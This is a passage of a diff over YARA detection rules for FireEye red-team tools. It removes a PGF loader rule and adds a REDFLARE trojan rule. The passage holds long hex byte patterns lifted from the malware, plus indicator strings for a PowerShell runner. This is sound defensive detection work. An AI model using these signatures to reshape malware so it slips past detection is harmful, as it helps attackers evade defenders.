89 C1 E8 86 FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 88 AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 44 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 7E 40 D9 63 A1 7C A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 8A 40 D9 63 89 04 24 A1 80 A1 D9 63 FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 70 A1 D9 63 FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 C8 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 D4 63 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 D4 63 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 61 BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 4C 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 A4 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 01 BC 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 79 A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 7A A3 00 00 8D 65 F4 5B 5E 5F 5D C3 }
-		$cond4 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? 90 EE 01 6D C7 85 ?? ?? ?? ?? 6C FE 01 6D 8D 85 ?? ?? ?? ?? 89 28 BA CC 19 00 6D 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 0C 40 05 6D A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 18 40 05 6D 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 00 6D 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 00 6D 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 }
-		$cond5 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? B0 EF 3D 6A C7 85 ?? ?? ?? ?? 8C FF 3D 6A 8D 85 ?? ?? ?? ?? 89 28 BA F4 1A 3C 6A 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 62 40 41 6A A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 6E 40 41 6A 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 3C 6A 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 3C 6A 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 }
-		$cond6 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? F0 EF D5 63 C7 85 ?? ?? ?? ?? CC FF D5 63 8D 85 ?? ?? ?? ?? 89 28 BA 28 1B D4 63 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 7E 40 D9 63 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 8A 40 D9 63 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 D4 63 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 D4 63 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 }
+		$1 = "PSRunner.PSRunner" fullword
+		$2 = "CorBindToRuntime" fullword
+		$3 = "ReportEventW" fullword
+		$4 = "InvokePS" fullword wide
+		$5 = "runCommand" fullword
+		$6 = "initialize" fullword
+		$trap = { 03 40 00 80 E8 [4] CC }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_PGF_5 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_2 : FILE
 {
 	meta:
-		description = "PGF payload, generated rule based on symfunc/a86b004b5005c0bcdbd48177b5bac7b8"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "376875f3-00f2-58d0-ae22-7f52ea566da2"
-		date = "2020-12-08"
+		id = "84881e5c-05df-5911-af42-ec82e559588c"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_5.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_2.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "8c91a27bbdbe9fb0877daccd28bd7bb5"
-		logic_hash = "dfff615a1d329cf181294f7b0a32c11a21d66ff8a6aa6b9fcd183c9738369623"
+		hash = "9529c4c9773392893a8a0ab8ce8f8ce1,05b99d438dac63a5a993cea37c036673"
+		logic_hash = "1f2e1f644b1932486444dfda30b7dad7f50121f59fa493eb8a1a0528ae46db26"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 2
 
 	strings:
-		$cond1 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 00 30 00 10 33 C5 89 45 E0 56 C7 45 F8 00 00 00 00 C6 85 D8 FE FF FF 00 68 03 01 00 00 6A 00 8D 85 D9 FE FF FF 50 E8 F9 07 00 00 83 C4 0C C7 45 F4 00 00 00 00 C6 45 E7 00 C7 45 E8 00 00 00 00 C7 45 EC 00 00 00 00 C7 45 FC 00 00 00 00 C7 45 F0 00 00 00 00 6A 01 6A 00 8D 8D D8 FE FF FF 51 6A 00 68 9C 10 00 10 8B 15 10 30 00 10 52 E8 31 01 00 00 89 45 F8 6A 14 FF 15 5C 10 00 10 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 C2 0C 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF 00 00 00 00 EB 0F 8B 85 D4 FE FF FF 83 C0 01 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D 1F 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB C9 8B 55 F8 8B 42 08 89 45 FC 6A 40 68 00 30 00 00 8B 4D FC 51 6A 00 FF 15 00 10 00 10 89 45 EC 8B 55 FC 52 8B 45 F8 83 C0 20 50 8B 4D EC 51 E8 F0 06 00 00 83 C4 0C C7 85 D0 FE FF FF 00 00 00 00 EB 0F 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 30 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE 14 00 00 00 F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB B6 8B 4D EC 89 4D F0 FF 55 F0 5E 8B 4D E0 33 CD E8 6D 06 00 00 8B E5 5D C3 }
-		$cond2 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 00 30 00 10 33 C5 89 45 E0 56 C7 45 F8 00 00 00 00 C6 85 D8 FE FF FF 00 68 03 01 00 00 6A 00 8D 85 D9 FE FF FF 50 E8 F9 07 00 00 83 C4 0C C7 45 F4 00 00 00 00 C6 45 E7 00 C7 45 E8 00 00 00 00 C7 45 EC 00 00 00 00 C7 45 FC 00 00 00 00 C7 45 F0 00 00 00 00 6A 01 6A 00 8D 8D D8 FE FF FF 51 6A 00 68 9C 10 00 10 8B 15 20 33 00 10 52 E8 31 01 00 00 89 45 F8 6A 14 FF 15 58 10 00 10 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 C2 0C 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF 00 00 00 00 EB 0F 8B 85 D4 FE FF FF 83 C0 01 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D 1F 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB C9 8B 55 F8 8B 42 08 89 45 FC 6A 40 68 00 30 00 00 8B 4D FC 51 6A 00 FF 15 2C 10 00 10 89 45 EC 8B 55 FC 52 8B 45 F8 83 C0 20 50 8B 4D EC 51 E8 F0 06 00 00 83 C4 0C C7 85 D0 FE FF FF 00 00 00 00 EB 0F 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 30 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE 14 00 00 00 F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB B6 8B 4D EC 89 4D F0 FF 55 F0 5E 8B 4D E0 33 CD E8 6D 06 00 00 8B E5 5D C3 }
-		$cond3 = { 8B FF 55 8B EC 81 EC 30 01 00 00 A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 C7 45 ?? 00 00 00 00 C6 85 ?? ?? ?? ?? 00 68 03 01 00 00 6A 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C C7 45 ?? 00 00 00 00 C6 45 ?? 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 6A 01 6A 00 8D 8D ?? ?? ?? ?? 51 6A 00 68 9C 10 00 10 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 6A 14 FF 15 ?? ?? ?? ?? 83 C4 04 89 45 ?? 8B 45 ?? 8A 48 ?? 88 4D ?? 8B 55 ?? 83 C2 0C 8B 45 ?? 8B 0A 89 08 8B 4A ?? 89 48 ?? 8B 4A ?? 89 48 ?? 8B 4A ?? 89 48 ?? 8B 52 ?? 89 50 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 8B 85 ?? ?? ?? ?? 83 C0 01 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 14 7D ?? 8B 4D ?? 03 8D ?? ?? ?? ?? 0F B6 11 0F B6 45 ?? 33 D0 8B 4D ?? 03 8D ?? ?? ?? ?? 88 11 EB ?? 8B 55 ?? 8B 42 ?? 89 45 ?? 6A 40 68 00 30 00 00 8B 4D ?? 51 6A 00 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 52 8B 45 ?? 83 C0 20 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 0C C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 83 C2 01 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 73 ?? 8B 4D ?? 03 8D ?? ?? ?? ?? 0F B6 09 8B 85 ?? ?? ?? ?? 99 BE 14 00 00 00 F7 FE 8B 45 ?? 0F B6 14 10 33 CA 8B 45 ?? 03 85 ?? ?? ?? ?? 88 08 EB ?? 8B 4D ?? 89 4D ?? FF 55 ?? 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 }
